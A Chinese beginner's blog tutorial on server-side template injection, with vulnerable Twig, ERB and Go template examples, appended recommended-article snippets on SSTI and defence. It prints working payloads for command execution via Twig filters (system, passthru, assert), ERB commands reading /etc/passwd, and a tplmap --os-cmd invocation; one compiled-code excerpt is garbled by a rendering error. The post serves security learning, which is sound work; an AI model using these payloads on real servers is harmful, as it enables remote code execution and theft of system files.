适合小白学的基础知识—SSTI漏洞学习

最新推荐文章于 2025-02-08 21:49:09 发布
最新推荐文章于 2025-02-08 21:49:09 发布
阅读量1k 收藏 7
点赞数 5
分类专栏: 网络 安全 渗透测试 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/HBohan/article/details/119252925
版权

在这里插入图片描述

SSTI 简介

MVC
MVC是一种框架型模式,全名是Model View Controller。

即模型(model)-视图(view)-控制器(controller)
在MVC的指导下开发中用一种业务逻辑、数据、界面显示分离的方法组织代码,将业务逻辑聚集到一个部件里面,在改进和个性化定制界面及用户交互的同时,得到更好的开发和维护效率。

在MVC框架中,用户的输入通过 View 接收,交给 Controller ,然后由 Controller 调用 Model 或者其他的 Controller 进行处理,最后再返回给 View ,这样就最终显示在我们的面前了,那么这里的 View 中就会大量地用到一种叫做模板的技术。

绕过服务端接收了用户的恶意输入以后,未经任何处理就将其作为 Web 应用模板内容的一部分,而模板引擎在进行目标编译渲染的过程中,执行了用户插入的可以破坏模板的语句,就会导致敏感信息泄露、代码执行、GetShell 等问题.

虽然市面上关于SSTI的题大都出在python上,但是这种攻击方式请不要认为只存在于 Python 中,凡是使用模板的地方都可能会出现 SSTI 的问题,SSTI 不属于任何一种语言。

常见的模板引擎和注入漏洞

Twig(PHP)
首先以Twig模板引擎介绍SSTI,很多时候,SSTI发生在直接将用户输入作为模板,比如下面的代码

<?php
require_once "./vendor/autoload.php";

$loader = new \Twig\Loader\ArrayLoader([
    'index' => 'Hello {{ name }}!',
]);
$twig = new \Twig\Environment($loader);


$template = $twig->createTemplate("Hello {$_GET['name']}!");

echo $template->render();

createTemplate时注入了$_GET[‘name’],就会引发SSTI

而如下代码则不会,因为模板引擎解析的是字符串常量中的{{name}},而不是动态拼接的$_GET[“name”]

<?php
require_once "./vendor/autoload.php";

$loader = new \Twig\Loader\ArrayLoader([
    'index' => 'Hello {{ name }}!',
]);
$twig = new \Twig\Environment($loader);

echo $twig->render('index', array("name" => $_GET["name"]));

而对于模板引擎的利用,往往是借助模板中的一些方法实现攻击目的,比如Twig中的过滤器map
在这里插入图片描述

举个经典的例子

{{[“man”]|map((arg)=>“hello #{arg}”)}}
会被编译成下面这样

twig_array_map([0 => “id”], function (KaTeX parse error: Expected group after '_' at position 1: _̲_arg__) use (context, $macros) { $context[“arg”] = KaTeX parse error: Expected group after '_' at position 1: _̲_arg__; return …context[“arg”] ?? null))

关于这个twig_array_map,源码中是这样的
在这里插入图片描述

可以看到传入的$arrow被当作函数执行,那么可以不传arrow function,可以只传一个字符串,找个两个参数的能够命令执行的危险函数即可

比如

{{["id"]|map("system")|join(",")}}
{{["phpinfo();"]|map("assert")|join(",")}}
{{["id", 0]|map("passthru")}}

类似的,我们还可以找到一些其他的过滤器sort,filiter,网上也有较多介绍,就不再赘述了。

当然,SSTI还有一种基础的利用方式就是用来泄露源码和程序环境中的上下文信息,在Twig引擎中,我们可以通过下面方法获得一些关于当前应用的信息

{{_self}} #指向当前应用
{{_self.env}}
{{dump(app)}}
{{app.request.server.all|join(',')}}

ERB(Ruby)

相较于Twig,ERB的代码直接提供了一些命令执行的接口,比如

<%= system("whoami") %>
<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines()  %>

这里提起他主要是引出模板标签的一些分类

比如这里的ERB模板标签使用<%= %>,Twig使用{{}},根据一些简单的poc和标签的分类,我们可以快速识别出是否存在模板漏洞以及所使用的模板引擎技术

在这里插入图片描述

当然有些模板引擎的标签是可以自定义的,上面列出的只是默认情况

Golang SSTI

关于Golang Template的SSTI研究目前来说还比较少,可能是因为本身设计的也比较安全。

不过通过{{.}}我们可以获得到作用域

在这里插入图片描述

比如在下面这个例子中

package main

import (
    "html/template"
    "net/http"
)

func handler(w http.ResponseWriter, r *http.Request) {
    //var name = ""
    r.ParseForm() // Parses the request body
    x := r.Form.Get("name")
    var test map[string]interface{}
    test = make(map[string]interface{})

    var secret map[string]interface{}
    secret = make(map[string]interface{})

    flag := "flag{testflag}"
    secret["flag"] = &flag

    test["secret"] = secret

    var tmpl = `<!DOCTYPE html><html><body>
<form action="/" method="post">
    First name:<br>
<input type="text" name="name" value="">
<input type="submit" value="Submit">
</form><p>` + x + ` </p></body></html>`

    t := template.New("main") //name of the template is main
    t, _ = t.Parse(tmpl)      // parsing of template string
    t.Execute(w, test)
}

func main() {
    server := http.Server{
        Addr: "0.0.0.0:5090",
    }
    http.HandleFunc("/", handler)
    server.ListenAndServe()
}

可以获取到作用域对象

在这里插入图片描述

进一步可以获得flag

在这里插入图片描述

甚至如果在作用域中存在可以利用的函数,我们还可以调用该函数完成攻击,比如

type User struct {
    ID       int
    Email    string
    Password string
}

func (u User) System(test string) string {
    out, _ := exec.Command(test).CombinedOutput()
    return string(out)
}

就有

在这里插入图片描述

Flask/Jinja
这个引擎应该是出镜率最高的了,能写的东西也很多,由于篇幅所限,具体内容会在(下)中展开记录。

常用检测工具 Tplmap

工具地址:https://github.com/epinna/tplmap

和sqlmap的设计风格一致,直接怼就行

/tplmap.py --os-cmd -u 'http://www.target.com/page?name=John'

总结

SSTI在MVC架构中是经常出现的一类问题,除去本文中介绍的几个引擎,还有许多受影响的引擎,比如Velocity 等。该问题主要是由于开发者直接将用户输入作为模板交给模板引擎渲染导致的,将用户输入绑定到模板的参数中可以缓解这一问题。通过SSTI,我们往往可以获取到程序运行的上下文环境,甚至利用模板引擎的内置方法完成远程代码注入等高危攻击。

我整理了网络安全的学习资料与指导书籍

吃碗面压压惊

在这里插入图片描述

网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 1万+
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解题详析
等风来
05-28 7436
2.命令执行注入:攻击者在应用程序中的命令执行语句中注入模板代码,从而执行任意系统命令,获取系统权限,对系统进行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句中注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问题。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句中注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 安全人才 威胁情报 安全建设 安全开发 解决方案
SSTI漏洞基础解析
小王的储物间
02-14 567
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
SSTi模板注入漏洞
Aidang的博客
08-23 1769
1.SSTI含义 SSTI是一种注入漏洞,其成因也可以比SQL注入。 SQL注入是从用户获得一个输入,然后用后端脚本语言进行数据库查询,利用输入来拼接我们想要的SQL语句。SSTI也是获取一个输入,然后在后端的渲染处理上进行语句的拼接执行。 但是和SQL注入不同的,SSTI利用的是现有的网站模板引擎,主要针对Python、PHP、JAVA的一些网站处理框架,比如Python的jinja2、mako、tornado、Django,PHP的smarty twig,java的jade velocity。当这
ssti模板总结
ANYOUZHEN的博客
06-02 186
如果用户输入作为【模板当中变量 的值】,模板引擎一般会对用户输入进行编码转义,不容易造成XSS攻击。这段代码输入会原样输出,因为进行了HTML实体编码。但是如果用户输入作为了【模板内容 的一部分】,用户输入会原样输出。这段代码输入会造成XSS漏洞。如果输入,会执行2*8这个语句,输出。因为经过渲染后,模板变成了。不同的模板会有不同的语法,一般使用Detect-Identify-Expoit的利用流程。模板总结:模板总结
SSTI入门详解
E1even的博客
03-15 5885
关于基于flask的SSTI漏洞的阶段学习小结: SSTI的理解: SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。 SSTI引发的真正原因: render_template渲染函数的问题 render_template渲染函数是什么: 就是把HTML涉及的页面与用户数据分离开,这样方便展示和管理。当用户输入自己的数据信息,HTML页面可以根据用户自身的信息来展示页面,因此才有了这个函数的使用。 ...
vulhub学习(3) flask-ssti 漏洞复现
yukinorong的博客
06-24 2377
环境准备 漏洞环境选择vulhub , 如上述配置 进入flask/ssti 打开docker环境 这里可以看见环境启动成功 由于我的vulhub配置在虚拟机上,不能直接用127访问。 打开命令行 ifconfig,找到ip 192.x docker 启动环境会另外配置端口,利用docker ps查询。发现是8000 漏洞原理 利用浏览器访问可以看见页面 查看源码 可以看到核心语句为 t = Template("hello " + name) 此处,函数利用get获取参数进入template
知识点(SSTI漏洞/flask框架/tonado框架)
2401_87524087的博客
02-08 679
Jinja2模版引擎(属于Flask框架,Python语言)和其他模板引擎,例:Twig(属于Symfony框架,PHP语言), Smarty(属于Codelgniter框架,PHP语言)Jinja2 是 Python 中一个模板引擎,常用于模板渲染,它提供了丰富的语法和功能,能方便地将动态数据与静态模板相结合,生成最终的 HTML、XML 等文档。在模板内的用法也和python中似,遍历的对象可以是字典、元组、列表等,但需要注意的是在模板中无法使用continue和break来对循环进行控制。
模板注入SSTI漏洞学习笔记
hauzhao的博客
09-24 1583
SSIT介绍 render_template函数的渲染出了问题,往往对用户输入的变量不做渲染,SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja2 mako tornado django,php的smarty twig,java的jade velocity。当这些框架对运用渲染函数生成html的时候会出现SSTI
python SSTI注入
weixin_44843084的博客
06-21 847
https://www.jianshu.com/p/a77c50dfebcb https://xz.aliyun.com/t/3679#toc-9 SSTI(Server-Side Template Injection) 服务端模板注入,就是服务器模板中拼接了恶意用户输入导致各种漏洞。通过模板,Web应用可以把输入转换成特定的HTML文件或者email格式 {{ ... }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% ... %}:装载一个控制语句。 {# ...
SSTI漏洞原理及渗透测试
二狗的博客
02-14 720
对于从来没有接触过网络安全的同,我们帮你准备了详细的学习成长路线图。可以说是最科最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好了。
[护网杯 2018]easy_tornado 1(STTI模板注入+Tornado的secret_cookie)
Home to come
08-19 1499
本文为个人刷题记录,不记录完整步骤,主要记录比较有感触的知识点 SSTI注入 参考:SSTI完全学习 SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。 常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对于sql注入的概念和原理很多人应该是相当清楚了,SSTI也是注入漏洞,其成因其实是可以比于sql注入的。 sql注入是从用户获得一个输入,然后又后端脚本语言
easy_tornado
nole_的博客
01-22 323
进入网址,看到一下内容 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mLMHFZFt-1611296176433)(C:\Users\Noel丶\Desktop\论坛\Easy_tornado\image-20210122125417272.png)] 首先,习惯性的访问一下 robots.txt,看一下有没有什么好东西 看来不存在 返回,f12,发现body中的三行文字,并且分别指向三个地址 ,依次打开 首先,很容易的观察到,我们请求的网址都是由filename以及 f
初识SSTI
weixin_44770698的博客
02-21 673
初识SSTI
SSTI漏洞初手入门
kracer的博客
01-08 1122
0x01 什么是SSTI SSTI,即服务器端模板注入(Server-Side Template Injection)。攻击者在服务器输入语句,服务端将其作为Web应用模板内容的一部分,在进行目标编译渲染的过程中,进行了语句的拼接,执行了所插入的恶意内容,从而导致信息泄露、代码执行、GetShell等问题。 补充: 1)模板引擎是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的文档,就是将模板文件和数据通过...
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3960
web安全-SSTI模板注入漏洞
ssti漏洞
最新发布
03-16
### SSTI漏洞原理 服务器端模板注入(Server-Side Template Injection, SSTI)是一种安全漏洞,允许攻击者通过控制模板输入参数,在服务器端模板引擎中执行恶意代码[^3]。这种漏洞通常发生在开发者未对用户输入进行适当过滤的情况下。 #### 漏洞形成原因 当模板引擎直接将未经验证的用户输入嵌入到模板字符串中时,可能会引发SSTI漏洞。例如,某些框架(如Python中的Jinja2)支持动态模板渲染功能,如果开发者错误地实现了如下危险代码: ```python template_str = f"Welcome, {user_input}" output = Template(template_str).render() ``` 上述代码片段中,`user_input`是由外部传入的数据,而该数据并未经过任何安全性处理就直接用于构建模板字符串。一旦攻击者能够操控此输入字段,则可能向其中插入恶意指令以触发远程代码执行或其他危害行为[^5]。 --- ### 防御措施 针对SSTI漏洞的有效防护手段主要包括以下几个方面: 1. **严格校验与清理用户提交的内容** 对所有来自客户端请求的数据都需进行全面细致地检查以及必要的转义操作,从而杜绝非法字符或者潜在有害语句混入最终形成的HTML页面之中[^4]。 2. **采用白名单机制限定可接受参数范围** 只允许预定义好的选项作为合法值参与后续业务逻辑运算过程;对于超出规定之外的选择一律拒绝受理. 3. **禁用复杂表达式的解析能力** 如果没有必要的话,应该关闭那些能够让脚本解释器理解并运行任意命令的功能开关。比如在配置文件里设置 `autoescape=True`, 这样就可以自动给所有的变量加上 HTML 转义标记: ```python from jinja2 import Environment, select_autoescape env = Environment(autoescape=select_autoescape(['html', 'xml'])) template = env.from_string('<b>{{ name }}</b>') print(template.render(name='<script>alert(1)</script>')) # 输出:<b><script>alert(1)</script></b> ``` 4. **最小化权限原则管理资源访问权** 确保只有真正需要的人才可以接触到敏感部位的信息资产,包括但不限于源码库、部署环境等等重要环节. 5. **定期更新依赖组件至最新稳定版本** 关注官方发布的补丁公告及时修复已知缺陷问题,减少因第三方库存在安全隐患而导致整体系统面临风险的可能性. --- ### 结论 综上所述,SSTI 是一种非常严重的 Web 应用层面上的安全隐患形式之一,它不仅可以让入侵者轻易获取目标主机上的机密资料甚至完全掌控整个网络架构体系结构,而且还会造成难以估量经济损失和社会影响后果严重程度不言自明。因此我们必须高度重视起来采取切实可行的技术方案加以防范遏制此事件再次发生几率降到最低水平线上去努力奋斗前行之路永无止境!
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值